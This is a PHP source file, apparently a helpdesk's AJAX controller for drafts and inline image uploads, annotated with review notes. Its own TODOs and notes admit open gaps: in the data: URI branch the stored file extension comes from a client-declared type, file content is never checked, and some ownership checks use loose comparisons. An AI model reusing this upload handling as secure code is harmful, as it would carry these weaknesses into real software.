Code Editor : ajax.draft.php
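<?php
/**
 * AJAX endpoints for drafts and their inline images.
 *
 * The class offers two parallel interfaces: the *Client methods, which
 * authorise through $thisclient or, for anonymous callers, through the
 * session id, and the staff methods, which require $thisstaff.
 *
 * NOTE(review): the guards below call Http::response() and then carry on as
 * if it never returns (e.g. $draft is used right after a 403 branch).
 * Presumably Http::response() terminates the request -- confirm.
 *
 * NOTE(review): both interfaces compare the caller's id with
 * Draft::getStaffId(). Confirm that client ids and staff ids cannot be
 * confused for one another on a draft record.
 */
if(!defined('INCLUDE_DIR')) die('!');

require_once(INCLUDE_DIR.'class.draft.php');

class DraftAjaxAPI extends AjaxController {

    /**
     * Tell whether the current PHP session is bound to a draft namespace.
     *
     * Anonymous drafts are tied to their creator by the last 12 characters
     * of the namespace, which must equal the last 12 characters of
     * session_id(). The comparison is strict (===): a loose != between two
     * numeric-looking strings is evaluated numerically in PHP and can treat
     * different suffixes as equal. An empty session id never matches.
     *
     * @param mixed $namespace Draft namespace taken from the request or the
     *                         stored draft.
     * @return bool True when the suffixes are identical.
     */
    private static function _sessionOwnsNamespace($namespace) {
        $sid = (string) session_id();
        if ($sid === '' || !is_string($namespace) || $namespace === '')
            return false;

        // NOTE(review): where the supported PHP versions provide it,
        // hash_equals() would make this comparison constant-time as well.
        return substr($namespace, -12) === substr($sid, -12);
    }

    /**
     * Create and save a draft from $vars plus the body found in $_POST,
     * then echo its id as JSON.
     *
     * @param array $vars Draft fields; 'body' is filled in here.
     * @return string|null JSON error document when no body was posted
     *                     (returned, not echoed -- presumably the caller
     *                     emits it; confirm).
     */
    function _createDraft($vars) {
        if (false === ($vars['body'] = self::_findDraftBody($_POST)))
            return JsonDataEncoder::encode(array(
                'error' => __("Draft body not found in request"),
                'code' => 422,
                ));

        if (!($draft = Draft::create($vars)) || !$draft->save())
            Http::response(500, 'Unable to create draft');

        echo JsonDataEncoder::encode(array(
            'draft_id' => $draft->getId(),
        ));
    }

    /**
     * Echo a draft's body (run through Format::viewableImages) and id as
     * JSON, or answer 205 when $draft is not a Draft.
     *
     * @param Draft|null $draft
     */
    function _getDraft($draft) {
        if (!$draft || !$draft instanceof Draft)
            Http::response(205, "Draft not found. Create one first");

        $body = Format::viewableImages($draft->getBody());

        echo JsonDataEncoder::encode(array(
            'body' => $body,
            'draft_id' => $draft->getId(),
        ));
    }

    /**
     * Replace a draft's body with the one found in $_POST and echo "{}".
     *
     * @param Draft $draft Draft the caller has already been authorised for.
     * @return string|null JSON error document when no body was posted.
     */
    function _updateDraft($draft) {
        if (false === ($body = self::_findDraftBody($_POST)))
            return JsonDataEncoder::encode(array(
                'error' => array(
                    'message' => "Draft body not found in request",
                    'code' => 422,
                )
            ));

        if (!$draft->setBody($body))
            return Http::response(500, "Unable to update draft body");

        echo "{}";
    }

    /**
     * Attach an uploaded image to a draft and echo its descriptor as JSON.
     *
     * Two request shapes are accepted: a multipart upload in
     * $_FILES['file'] (whose content may itself be a data: URI), or a
     * base64 payload in $_POST['data'] described by $_POST['contentType'].
     * Both paths now require a declared image/* type and enforce
     * $cfg->getMaxFileSize(); previously the base64 path accepted any
     * content type and any size, and used the client-supplied subtype as
     * the stored file extension without checking it.
     *
     * The declared type is still client-controlled: the file content itself
     * is not inspected (see the TODOs below).
     *
     * @param Draft $draft Draft the caller has already been authorised for.
     */
    function _uploadInlineImage($draft) {
        global $cfg;

        if (!isset($_POST['data']) && !isset($_FILES['file']))
            Http::response(422, "File not included properly");

        # Fixup for expected multiple attachments
        if (isset($_FILES['file'])) {
            $file = AttachmentFile::format($_FILES['file']);

            // Refuse malformed uploads instead of reading a missing entry
            if (!is_array($file) || !isset($file[0]['tmp_name']))
                return Http::response(422, "File not included properly");

            # Allow for data-uri uploaded files
            $fp = fopen($file[0]['tmp_name'], 'rb');
            if (!$fp)
                return Http::response(422, "File not included properly");

            if (fread($fp, 5) == 'data:') {
                $data = 'data:';
                while ($block = fread($fp, 8192))
                    $data .= $block;
                $file[0] = Format::parseRfc2397($data);
                // NOTE(review): the extension is taken from the type
                // declared inside the data: URI; only the image/ prefix is
                // checked below.
                list(,$ext) = explode('/', $file[0]['type'], 2);
                $file[0] += array(
                    'name' => Misc::randCode(8).'.'.$ext,
                    'size' => strlen($file[0]['data']),
                );
            }
            fclose($fp);

            # TODO: Detect unacceptable attachment extension
            # TODO: Verify content-type and check file-content to ensure image
            if (strpos($file[0]['type'], 'image/') !== 0)
                return Http::response(403,
                    JsonDataEncoder::encode(array(
                        'error' => 'File type is not allowed',
                    ))
                );

            # TODO: Verify file size is acceptable
            if ($file[0]['size'] > $cfg->getMaxFileSize())
                return Http::response(403,
                    JsonDataEncoder::encode(array(
                        'error' => 'File is too large',
                    ))
                );

            // Paste uploads in Chrome will have a name of 'blob'
            if ($file[0]['name'] == 'blob')
                $file[0]['name'] = 'screenshot-'.Misc::randCode(4);

            $ids = $draft->attachments->upload($file);

            if (!$ids) {
                // 'error' is absent after a data: URI replaced the entry
                if (!empty($file[0]['error'])) {
                    return Http::response(403,
                        JsonDataEncoder::encode(array(
                            'error' => $file[0]['error'],
                        ))
                    );
                }
                else
                    return Http::response(500, 'Unable to attach image');
            }

            $id = (is_array($ids)) ? $ids[0] : $ids;
        }
        else {
            // The content type names the stored file's extension, so it must
            // be a plain image/<subtype> token before it is used.
            $contentType = isset($_POST['contentType'])
                ? $_POST['contentType'] : null;
            if (!is_string($contentType)
                    || !preg_match('`^image/[\w.+-]+\z`', $contentType))
                return Http::response(403,
                    JsonDataEncoder::encode(array(
                        'error' => 'File type is not allowed',
                    ))
                );

            if (!is_string($_POST['data']))
                return Http::response(422, "File not included properly");

            $data = base64_decode($_POST['data']);
            if ($data === false)
                return Http::response(422, "File not included properly");

            // Same ceiling as the multipart path
            if (strlen($data) > $cfg->getMaxFileSize())
                return Http::response(403,
                    JsonDataEncoder::encode(array(
                        'error' => 'File is too large',
                    ))
                );

            list(,$subtype) = explode('/', $contentType, 2);
            $info = array(
                'data' => $data,
                'name' => Misc::randCode(10).'.'.$subtype,
                'type' => $contentType,
            );
            // TODO: Detect unacceptable filetype
            // TODO: Verify content-type and check file-content to ensure image
            $id = $draft->attachments->save($info);
        }

        if (!($f = AttachmentFile::lookup($id)))
            return Http::response(500, 'Unable to attach image');

        echo JsonDataEncoder::encode(array(
            $f->getName() => array(
                'content_id' => 'cid:'.$f->getKey(),
                'id' => $f->getKey(),
                // Return draft_id to connect the auto draft creation
                'draft_id' => $draft->getId(),
                'url' => $f->getDownloadUrl(
                    ['type' => 'D', 'deposition' => 'inline']),
            )));
    }

    // Client interface for drafts =======================================

    /**
     * Create a draft for a client. Anonymous callers must present a
     * namespace bound to their session.
     */
    function createDraftClient($namespace) {
        global $thisclient;

        if (!$thisclient && !self::_sessionOwnsNamespace($namespace))
            Http::response(403, "Valid session required");

        $vars = array(
            'namespace' => $namespace,
        );

        return self::_createDraft($vars);
    }

    /**
     * Fetch a client's draft by namespace. Logged-in clients are looked up
     * with their own id, anonymous callers with id 0 after the session
     * check.
     */
    function getDraftClient($namespace) {
        global $thisclient;

        if ($thisclient) {
            try {
                $draft = Draft::lookupByNamespaceAndStaff($namespace,
                    $thisclient->getId());
            }
            catch (DoesNotExist $e) {
                Http::response(205, "Draft not found. Create one first");
            }
        }
        else {
            if (!self::_sessionOwnsNamespace($namespace))
                Http::response(404, "Draft not found");
            try {
                $draft = Draft::lookupByNamespaceAndStaff($namespace, 0);
            }
            catch (DoesNotExist $e) {
                Http::response(205, "Draft not found. Create one first");
            }
        }
        return self::_getDraft($draft);
    }

    /**
     * Update a client's draft after checking that the caller owns it.
     */
    function updateDraftClient($id) {
        global $thisclient;

        if (!($draft = Draft::lookup($id)))
            Http::response(205, "Draft not found. Create one first");
        // Check the owning client-id (for logged-in users), and the
        // session_id() for others
        elseif ($thisclient) {
            if ($draft->getStaffId() != $thisclient->getId())
                Http::response(404, "Draft not found");
        }
        else {
            if (!self::_sessionOwnsNamespace($draft->getNamespace()))
                Http::response(404, "Draft not found");
        }

        return self::_updateDraft($draft);
    }

    /**
     * Delete a client's draft after checking that the caller owns it.
     */
    function deleteDraftClient($id) {
        global $thisclient;

        if (!($draft = Draft::lookup($id)))
            Http::response(205, "Draft not found. Create one first");
        elseif ($thisclient) {
            if ($draft->getStaffId() != $thisclient->getId())
                Http::response(404, "Draft not found");
        }
        else {
            if (!self::_sessionOwnsNamespace($draft->getNamespace()))
                Http::response(404, "Draft not found");
        }

        $draft->delete();
    }

    /**
     * Attach an inline image to a client's existing draft after checking
     * that the caller owns it.
     */
    function uploadInlineImageClient($id) {
        global $thisclient;

        if (!($draft = Draft::lookup($id)))
            Http::response(205, "Draft not found. Create one first");
        elseif ($thisclient) {
            if ($draft->getStaffId() != $thisclient->getId())
                Http::response(404, "Draft not found");
        }
        else {
            if (!self::_sessionOwnsNamespace($draft->getNamespace()))
                Http::response(404, "Draft not found");
        }

        return self::_uploadInlineImage($draft);
    }

    /**
     * Create a draft for the namespace, then attach the uploaded image to
     * it, for uploads that arrive before any draft exists.
     */
    function uploadInlineImageEarlyClient($namespace) {
        global $thisclient;

        if (!$thisclient && !self::_sessionOwnsNamespace($namespace))
            Http::response(403, "Valid session required");

        $draft = Draft::create(array(
            'namespace' => $namespace,
        ));
        if (!$draft->save())
            Http::response(500, 'Unable to create draft');

        return $this->uploadInlineImageClient($draft->getId());
    }

    // Staff interface for drafts ========================================

    /**
     * Create a draft for the logged-in staff member.
     */
    function createDraft($namespace) {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, "Login required for draft creation");

        $vars = array(
            'namespace' => $namespace,
        );

        return self::_createDraft($vars);
    }

    /**
     * Fetch the logged-in staff member's draft for a namespace.
     */
    function getDraft($namespace) {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, "Login required for draft creation");
        try {
            $draft = Draft::lookupByNamespaceAndStaff($namespace,
                $thisstaff->getId());
        }
        catch (DoesNotExist $e) {
            Http::response(205, "Draft not found. Create one first");
        }
        return self::_getDraft($draft);
    }

    /**
     * Update a draft owned by the logged-in staff member.
     */
    function updateDraft($id) {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, "Login required for image upload");
        elseif (!($draft = Draft::lookup($id)))
            Http::response(205, "Draft not found. Create one first");
        elseif ($draft->getStaffId() != $thisstaff->getId())
            Http::response(404, "Draft not found");

        return self::_updateDraft($draft);
    }

    /**
     * Attach an inline image to a draft owned by the logged-in staff
     * member.
     */
    function uploadInlineImage($draft_id) {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, "Login required for image upload");
        elseif (!($draft = Draft::lookup($draft_id)))
            Http::response(205, "Draft not found. Create one first");
        elseif ($draft->getStaffId() != $thisstaff->getId())
            Http::response(404, "Draft not found");

        return self::_uploadInlineImage($draft);
    }

    /**
     * Create a draft for the namespace, then attach the uploaded image to
     * it, for staff uploads that arrive before any draft exists.
     */
    function uploadInlineImageEarly($namespace) {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, "Login required for image upload");

        $draft = Draft::create(array(
            'namespace' => $namespace
        ));
        if (!$draft->save())
            Http::response(500, 'Unable to create draft');

        return $this->uploadInlineImage($draft->getId());
    }

    /**
     * Delete a draft owned by the logged-in staff member.
     */
    function deleteDraft($id) {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, "Login required for draft edits");
        elseif (!($draft = Draft::lookup($id)))
            Http::response(205, "Draft not found. Create one first");
        elseif ($draft->getStaffId() != $thisstaff->getId())
            Http::response(404, "Draft not found");

        $draft->delete();
    }

    /**
     * Echo a JSON list of image files the logged-in staff member may insert.
     *
     * Images of the requested thread are added to the query only when
     * threadId is numeric, resolves to a thread, and the staff member can
     * access the thread's object.
     */
    function getFileList() {
        global $thisstaff;

        if (!$thisstaff)
            Http::response(403, "Login required for file queries");

        $search = Q::any([
            Q::all([
                'attachments__type__in' => array('C', 'F', 'T', 'P'),
                'attachments__inline' => 1,
            ]),
            'ft' => 'L',
        ]);

        if (isset($_GET['threadId']) && is_numeric($_GET['threadId'])
            && ($thread = Thread::lookup($_GET['threadId']))
            && ($object = $thread->getObject())
            && ($thisstaff->canAccess($object))
        ) {
            $search->add(Q::all([
                'attachments__thread_entry__thread_id' => $_GET['threadId'],
                'attachments__inline' => 1,
            ]));
        }

        $images = AttachmentFile::objects()->filter([
                $search,
                'type__startswith' => 'image/',
            ])->distinct('id');

        $files = array();
        foreach ($images as $f) {
            $url = $f->getDownloadUrl();
            $files[] = array(
                // Don't send special sizing for thread items 'cause they
                // should be cached already by the client
                'thumb' => $url.($f->type != 'H' ? '&s=128' : ''),
                'url' => $url,
                'title' => $f->getName(),
            );
        }
        echo JsonDataEncoder::encode($files);
    }

    /**
     * Locate the draft body in a set of request variables.
     *
     * When 'name' is present it names the field holding the body, optionally
     * nested up to two levels (trans[lang]). Otherwise the first of a fixed
     * list of well-known field names is used.
     *
     * The field name is read from $vars rather than from $_POST directly,
     * and each step of a nested path is checked: a path that does not
     * resolve yields false, so callers' `false ===` test reports the missing
     * body instead of receiving NULL or a stray string offset.
     *
     * @param array $vars Request variables (callers pass $_POST).
     * @return mixed The body value, or false when none was found.
     */
    function _findDraftBody($vars) {
        if (isset($vars['name']) && is_string($vars['name'])) {
            $parts = array();
            // Support nested `name`, like trans[lang]
            if (preg_match('`(\w+)(?:\[(\w+)\])?(?:\[(\w+)\])?`', $vars['name'], $parts)) {
                array_shift($parts);
                $focus = $vars;
                foreach ($parts as $p) {
                    if (!is_array($focus) || !isset($focus[$p]))
                        return false;
                    $focus = $focus[$p];
                }
                return $focus;
            }
        }
        $field_list = array('response', 'note', 'answer', 'body',
             'message', 'issue', 'description');
        foreach ($field_list as $field) {
            if (isset($vars[$field])) {
                return $vars[$field];
            }
        }

        return false;
    }

}
?>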